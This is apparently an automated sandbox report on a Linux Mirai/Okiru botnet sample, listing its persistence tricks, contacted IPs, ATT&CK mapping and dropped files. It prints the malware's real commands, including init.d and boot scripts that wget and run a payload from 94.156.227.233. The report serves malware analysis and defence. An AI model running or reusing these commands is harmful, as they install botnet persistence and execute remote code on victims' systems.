Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal88.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/x86_32.nn.elf (PID: 6232)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/x86_32.nn.elf (PID: 6232)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6310)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6332)	File: /etc/rc.d/S99sh -> /etc/init.d/sh	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/x86_32.nn.elf (PID: 6232)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6308)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6316)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6450/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6452/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6451/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6454/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6453/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6456/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6455/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6425/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6424/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6427/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6449/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6448/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6426/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6461/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6460/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6386/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6463/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6462/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6344/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6465/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6464/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6422/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6060/cmdline	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6458/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6457/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6459/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6338)	File opened: /proc/6419/status	Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 6242)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6307)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6309)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6313)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6315)	Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6329)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6331)	Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6308)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6316)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh			Jump to behavior

Source: /bin/sh (PID: 6330)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /usr/bin/dash (PID: 6311)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA			Jump to behavior
Source: /usr/bin/dash (PID: 6314)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA			Jump to behavior

Source: /bin/sh (PID: 6267)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 6232)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6308)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6316)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 6232)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/x86_32.nn.elf (PID: 6232)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6313)	Writes shell script file to disk with an unusual file extension: /etc/init.d/sh	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/x86_32.nn.elf (PID: 6232)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6313)	File: /etc/init.d/sh			Jump to dropped file

Sample deletes itself

Source: /tmp/x86_32.nn.elf (PID: 6232)

File: /tmp/x86_32.nn.elf

Jump to behavior

Source: x86_32.nn.elf, 6241.1.0000000009dbd000.0000000009dbf000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: x86_32.nn.elf, 6232.1.00000000ffd2f000.00000000ffd50000.rw-.sdmp, x86_32.nn.elf, 6241.1.00000000ffd2f000.00000000ffd50000.rw-.sdmp, x86_32.nn.elf, 6335.1.00000000ffd2f000.00000000ffd50000.rw-.sdmp, x86_32.nn.elf, 6339.1.00000000ffd2f000.00000000ffd50000.rw-.sdmp	Binary or memory string: qemu-
Source: x86_32.nn.elf, 6241.1.0000000009dbd000.0000000009dbf000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsdx

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6241, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6335, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6339, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6241, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6335, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6339, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	11 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
x86_32.nn.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/init.d/sh	3%	ReversingLabs	Text.Browser.Generic
/etc/init.d/system	3%	ReversingLabs	Text.Browser.Generic
/etc/rc.local	0%	ReversingLabs
/etc/rc.local	0%	Virustotal		Browse

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://94.156.227.233/curl.sh	x86_32.nn.elf	false	high
http://94.156.227.233/lol.sh	x86_32.nn.elf	false	high
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	x86_32.nn.elf	false	high
http://94.156.227.233/	x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.42.dr, bootcmd.12.dr, custom.service.12.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
16.90.195.142	unknown	United States	unknown	unknown	false
61.233.196.40	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
47.159.109.247	unknown	United States	5650	FRONTIER-FRTRUS	false
108.189.48.62	unknown	United States	33363	BHN-33363US	false
138.226.170.110	unknown	Switzerland	12980	EMEAHostingAutonomousSystemEU	false
151.249.42.76	unknown	United Kingdom	44574	A4NAS44574GB	false
121.145.192.109	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
88.11.252.160	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
49.86.94.59	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
194.145.118.247	unknown	Germany	29108	LEITWERT-RESEARCHDE	false
46.250.181.70	unknown	Poland	34688	PL-MAVERICK-ASPL	false
58.65.241.107	unknown	Indonesia	24535	ISATNET-AS-IDPTInsanSaranaTelematikaID	false
211.218.239.156	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
157.246.109.62	unknown	United States	394271	SPS-157-246-0-0US	false
26.127.145.209	unknown	United States	7922	COMCAST-7922US	false
41.244.104.33	unknown	Cameroon	37620	VIETTEL-CM-ASCM	false
192.81.84.23	unknown	Canada	30048	CONVERGIA-NETCA	false
215.136.166.39	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
108.130.142.170	unknown	United States	16509	AMAZON-02US	false
86.188.53.172	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
218.43.149.218	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
65.241.23.79	unknown	United States	701	UUNETUS	false
107.248.86.231	unknown	United States	7018	ATT-INTERNET4US	false
29.113.94.55	unknown	United States	7922	COMCAST-7922US	false
5.18.62.230	unknown	Russian Federation	41733	ZTELECOM-ASRU	false
211.200.199.151	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
93.69.61.87	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
168.212.74.188	unknown	United States	10430	WA-K20US	false
199.188.249.152	unknown	United States	17306	RISE-BROADBANDUS	false
116.31.85.121	unknown	China	58466	CT-GUANGZHOU-IDCCHINANETGuangdongprovincenetworkCN	false
121.177.189.157	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
45.71.25.54	unknown	Brazil	267631	AJUNETBR	false
222.202.140.133	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
138.153.76.148	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
219.235.6.49	unknown	China	17621	CNCGROUP-SHChinaUnicomShanghainetworkCN	false
56.113.94.213	unknown	United States	2686	ATGS-MMD-ASUS	false
26.202.86.167	unknown	United States	7922	COMCAST-7922US	false
115.88.21.255	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
79.101.112.237	unknown	Serbia	8400	TELEKOM-ASRS	false
37.65.113.12	unknown	France	15557	LDCOMNETFR	false
56.140.154.121	unknown	United States	2686	ATGS-MMD-ASUS	false
49.52.200.230	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
88.204.146.7	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
164.237.248.89	unknown	United States	27047	DNIC-ASBLK-27032-27159US	false
174.88.124.185	unknown	Canada	577	BACOMCA	false
182.79.105.76	unknown	India	9498	BBIL-APBHARTIAirtelLtdIN	false
219.4.115.95	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
188.164.69.107	unknown	United Kingdom	39356	AVANTI-UK-ASGB	false
14.234.225.230	unknown	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	false
175.191.68.88	unknown	China	2510	INFOWEBFUJITSULIMITEDJP	false
35.200.152.187	unknown	United States	15169	GOOGLEUS	false
77.219.167.39	unknown	Sweden	1257	TELE2EU	false
18.10.246.197	unknown	United States	3	MIT-GATEWAYSUS	false
114.232.54.239	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
71.118.23.202	unknown	United States	5650	FRONTIER-FRTRUS	false
46.205.168.229	unknown	Poland	12912	TMPL	false
9.237.213.78	unknown	United States	3356	LEVEL3US	false
179.239.7.19	unknown	Brazil	7738	TelemarNorteLesteSABR	false
143.191.157.249	unknown	United States	17477	MCT-SYDNEYMacquarieTelecomAU	false
76.14.39.41	unknown	United States	11404	AS-WAVE-1US	false
1.126.222.164	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
144.168.24.148	unknown	United States	32931	PEAKTERAUS	false
44.232.218.63	unknown	United States	16509	AMAZON-02US	false
58.10.75.114	unknown	Thailand	17552	TRUE-AS-APTrueInternetCoLtdTH	false
49.131.105.123	unknown	Hong Kong	17924	SMARTONE-MB-AS-APSmarToneMobileCommunicationsLtdHK	false
18.64.241.39	unknown	United States	3	MIT-GATEWAYSUS	false
189.255.81.119	unknown	Mexico	8151	UninetSAdeCVMX	false
135.104.249.188	unknown	United States	10455	LUCENT-CIOUS	false
141.22.216.117	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
160.106.164.183	unknown	Canada	715	WOODYNET-2US	false
119.20.76.243	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
36.163.114.52	unknown	China	9808	CMNET-GDGuangdongMobileCommunicationCoLtdCN	false
93.245.89.62	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
114.208.224.169	unknown	China	9595	XEPHIONNTT-MECorporationJP	false
116.24.104.134	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
187.103.242.245	unknown	Brazil	28283	AdylnetTelecomBR	false
108.68.190.123	unknown	United States	7018	ATT-INTERNET4US	false
70.162.134.108	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
11.186.51.13	unknown	United States	3356	LEVEL3US	false
144.33.193.131	unknown	United States	786	JANETJiscServicesLimitedGB	false
158.38.111.112	unknown	Norway	224	UNINETTUNINETTTheNorwegianUniversityResearchNetwork	false
140.197.190.186	unknown	United States	210	WEST-NET-WESTUS	false
86.3.196.5	unknown	United Kingdom	5089	NTLGB	false
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
36.82.145.157	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	false
57.159.205.203	unknown	Belgium	2686	ATGS-MMD-ASUS	false
116.126.230.31	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
97.30.217.167	unknown	United States	22394	CELLCOUS	false
48.155.61.30	unknown	United States	2686	ATGS-MMD-ASUS	false
216.240.251.4	unknown	United States	35986	VYVE-BROADBANDUS	false
163.206.140.184	unknown	United States	1843	AS1843-7US	false
147.201.255.206	unknown	United Kingdom	55542	RMSNET-AS-APRoadsandMaritimeServicesAU	false
111.15.95.101	unknown	China	24444	CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompany	false
178.158.63.197	unknown	Ukraine	30822	MAGEAL-ASUA	false
96.222.218.77	unknown	United States	7922	COMCAST-7922US	false
66.111.1.41	unknown	United States	11403	NYINTERNETUS	false
106.200.173.19	unknown	India	45609	BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSService	false
208.14.132.76	unknown	United States	1239	SPRINTLINKUS	false
9.38.169.204	unknown	United States	3356	LEVEL3US	false
156.60.17.48	unknown	United States	1226	CTA-42-AS1226US	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
16.90.195.142	thMtniHOSg	Get hash	malicious	Mirai	Browse
16.90.195.142	Zeus.arm5	Get hash	malicious	Mirai	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FRONTIER-FRTRUS	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	47.207.214.232
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	96.226.10.68
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	71.189.123.6
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	108.9.6.153
	sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	47.172.249.242
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	47.200.126.137
	m68k.elf	Get hash	malicious	Mirai	Browse	172.78.167.220
	teste.x86_64.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	47.171.81.23
	arm7.elf	Get hash	malicious	Mirai	Browse	66.12.49.118
	teste.arm7.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	47.195.23.81
CTTNETChinaTieTongTelecommunicationsCorporationCN	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	222.35.143.254
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	36.198.48.234
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	222.58.250.208
	armv7l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	110.113.89.16
	sh4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	123.87.18.126
	sora.mips.elf	Get hash	malicious	Mirai	Browse	101.148.166.222
	x86.elf	Get hash	malicious	Mirai	Browse	101.156.181.236
	m68k.elf	Get hash	malicious	Mirai	Browse	110.221.143.114
	teste.i686.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	111.142.109.136
	teste.mpsl.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	222.48.74.133
BHN-33363US	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	208.118.8.99
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	97.76.4.84
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	65.32.18.223
	sh4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	71.44.189.203
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	70.126.74.241
	spc.elf	Get hash	malicious	Mirai	Browse	35.143.25.232
	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse	71.47.144.224
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	68.202.122.111
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	97.69.42.206
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	47.227.159.129
EMEAHostingAutonomousSystemEU	sora.ppc.elf	Get hash	malicious	Mirai	Browse	138.227.8.69
	teste.sh4.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	138.224.165.206
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	170.225.208.16
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	138.242.50.73
	mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	138.227.8.66
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	138.241.101.194
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	138.226.40.168
	amen.x86.elf	Get hash	malicious	Mirai	Browse	138.240.246.241
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	138.242.159.3
	bin.arm7.elf	Get hash	malicious	Mirai	Browse	138.241.35.86

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/system	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/init.d/sh	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.663595298101345
Encrypted:	false
SSDEEP:	3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
MD5:	3290F4F4E0B77B577C59026DEF246CEE
SHA1:	C51EAE7170430B5697B881BE716280D1FAAA9147
SHA-256:	534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
SHA-512:	DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/sh

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	355
Entropy (8bit):	4.416220583499086
Encrypted:	false
SSDEEP:	6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
MD5:	4C835AF4434E28E5B56D8CDFA8EE753D
SHA1:	B18DA30B2DF68AE4C788540CED328CA545C02F42
SHA-256:	CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
SHA-512:	877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse
Reputation:	low
